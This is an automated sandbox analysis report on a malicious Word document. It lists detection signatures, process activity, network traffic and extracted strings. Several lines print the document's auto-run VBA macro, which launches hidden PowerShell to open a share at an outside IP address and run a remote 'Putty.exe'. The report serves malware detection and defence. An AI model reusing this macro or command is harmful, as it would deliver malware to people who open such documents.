Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ham9SAD0Ou.doc

Overview

General Information

Sample name:Ham9SAD0Ou.doc
renamed because original name is a hash value
Original sample name:6005516d783bde80a25763acbb85230b.docx.doc
Analysis ID:1540325
MD5:6005516d783bde80a25763acbb85230b
SHA1:e7a231af0530a09066717d3c1fcd340e215e83d9
SHA256:edfc124678400137fbe36333ef1114ebd69dd7448f88c02eb68825a3392773fc
Tags:docdocxuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Machine Learning detection for dropped file
Machine Learning detection for sample
Opens network shares
Sigma detected: Suspicious Microsoft Office Child Process
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3404 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 3496 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
      • explorer.exe (PID: 3616 cmdline: "C:\Windows\explorer.exe" \\89.23.98.98@80\file\ MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • explorer.exe (PID: 3668 cmdline: explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 3404, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe", ProcessId: 3496, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 3404, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe", ProcessId: 3496, ProcessName: powershell.exe
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3404, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3496, TargetFilename: C:\Users\user\AppData\Local\Temp\jtfthxgk.dkd.ps1
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Ham9SAD0Ou.docAvira: detected
Source: C:\Users\user\Desktop\~WRD0000.tmpAvira: detection malicious, Label: HEUR/Macro.Downloader.MRSY.Gen
Source: Ham9SAD0Ou.docReversingLabs: Detection: 42%
Source: C:\Users\user\Desktop\~WRD0000.tmpJoe Sandbox ML: detected
Source: Ham9SAD0Ou.docJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: .pdb: source: powershell.exe, 00000002.00000002.392522585.000000001BB63000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 89.23.98.98:80
Source: global trafficTCP traffic: 89.23.98.98:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 89.23.98.98:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 89.23.98.98:80
Source: global trafficTCP traffic: 89.23.98.98:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 89.23.98.98:80

Networking

barindex
Source: C:\Windows\explorer.exeNetwork Connect: 89.23.98.98 80Jump to behavior
Source: Joe Sandbox ViewASN Name: MAXITEL-ASRU MAXITEL-ASRU
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.98.98
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.98.98
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.98.98
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.98.98
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5C96A7A8-2E90-4086-A586-FD55B96AEBCA}.tmpJump to behavior
Source: explorer.exe, 00000004.00000002.380623964.000000000020B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.380623964.00000000001FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.23.98.98/
Source: explorer.exe, 00000005.00000002.1091711614.00000000002CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
Source: powershell.exe, 00000002.00000002.389315931.0000000012B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.385717407.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000002.1091711614.00000000002CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000005.00000002.1092043382.0000000003CD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com
Source: explorer.exe, 00000005.00000002.1092043382.0000000003CD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/cc
Source: explorer.exe, 00000005.00000002.1091711614.000000000034A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.1092394208.00000000062B0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.1091885223.0000000002600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000002.00000002.382279546.000000000033E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.1092394208.00000000062B0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.1091885223.0000000002600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000005.00000002.1091711614.000000000034A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerm
Source: explorer.exe, 00000005.00000002.1092043382.0000000003CD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
Source: powershell.exe, 00000002.00000002.389315931.0000000012B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.389315931.0000000012B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.389315931.0000000012B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.389315931.0000000012B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000005.00000002.1091711614.00000000002CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000005.00000002.1091711614.00000000002CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000005.00000002.1091711614.00000000002CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

System Summary

barindex
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, API IWshShell3.Run("powershell.exe -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"",1:Integer,True)Name: Document_Open
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: JbxHook_Run_3__ob = jbxthis.Run(jbxparam0, jbxparam1, jbxparam2)
Source: Ham9SAD0Ou.docOLE, VBA macro line: Set objShell = CreateObject("WScript.Shell")
Source: Ham9SAD0Ou.docOLE, VBA macro line: strCommand = "powershell.exe -WindowStyle Hidden -c ""explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"""
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String wscript: Set objShell = CreateObject("WScript.Shell")Name: Document_Open
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String powershell: strCommand = "powershell.exe -WindowStyle Hidden -c ""explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"""Name: Document_Open
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: strCommand = "powershell.exe -WindowStyle Hidden -c ""explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_000007FE89DD329A2_2_000007FE89DD329A
Source: Ham9SAD0Ou.docOLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_OpenName: Document_Open
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Sub Document_Open()
Source: Ham9SAD0Ou.docOLE indicator, VBA macros: true
Source: ~WRD0000.tmp.0.drOLE indicator, VBA macros: true
Source: ~WRF{3A14B1C6-5901-4E7D-84B7-8F898608CC14}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engineClassification label: mal100.spyw.expl.evad.winDOC@6/15@0/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$m9SAD0Ou.docJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR9839.tmpJump to behavior
Source: Ham9SAD0Ou.docOLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.drOLE indicator, Word Document stream: true
Source: Ham9SAD0Ou.docOLE document summary: title field not present or empty
Source: Ham9SAD0Ou.docOLE document summary: edited time not present or 0
Source: ~WRF{3A14B1C6-5901-4E7D-84B7-8F898608CC14}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{3A14B1C6-5901-4E7D-84B7-8F898608CC14}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{3A14B1C6-5901-4E7D-84B7-8F898608CC14}.tmp.0.drOLE document summary: edited time not present or 0
Source: ~WRD0000.tmp.0.drOLE document summary: title field not present or empty
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P%.............T.h.e. .n.e.t.w.o.r.k. .p.a.t.h. .w.a.s. .n.o.t. .f.o.u.n.d..............3........r.....<........K..............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm%...............r.....I. k....}..w.....K......\.......................(.P.....................(.r.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.9......... k............(.P.......................r.....".......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm%...............r.....I. k....}..w.....K......\.......................(.P.....................(.r.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................K......}..w.............U........ k............(.P.....................................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................K......}..w.............U........ k............(.P.....................................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................K......}..w.............U........ k............(.P.....................................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................K......}..w.............U........ k............(.P.............................f.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........K......}..w.............U........ k............(.P.......................r.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\explorer.exeJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\explorer.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Ham9SAD0Ou.docReversingLabs: Detection: 42%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" \\89.23.98.98@80\file\
Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" \\89.23.98.98@80\file\Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: duser.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: davhlpr.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: credssp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: duser.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cscdll.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: rpcrtremote.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sndvolsso.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: hid.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wer.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msiltcfg.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msftedit.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ksuser.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: avrt.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: audioses.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msacm32.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: midimap.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: davhlpr.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: batmeter.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: qutil.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: credssp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wlanapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wlanutil.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wwapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: webcheck.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wscapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wercplsupport.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: bcrypt.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: fxsst.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: fxsapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mfplat.dllJump to behavior
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\InProcServer32Jump to behavior
Source: Ham9SAD0Ou.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Ham9SAD0Ou.doc
Source: C:\Windows\explorer.exeFile opened: C:\Windows\system32\MsftEdit.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: Ham9SAD0Ou.docInitial sample: OLE summary template = fwd.dotm
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: .pdb: source: powershell.exe, 00000002.00000002.392522585.000000001BB63000.00000004.00000020.00020000.00000000.sdmp
Source: ~WRF{3A14B1C6-5901-4E7D-84B7-8F898608CC14}.tmp.0.drInitial sample: OLE indicators vbamacros = False

Data Obfuscation

barindex
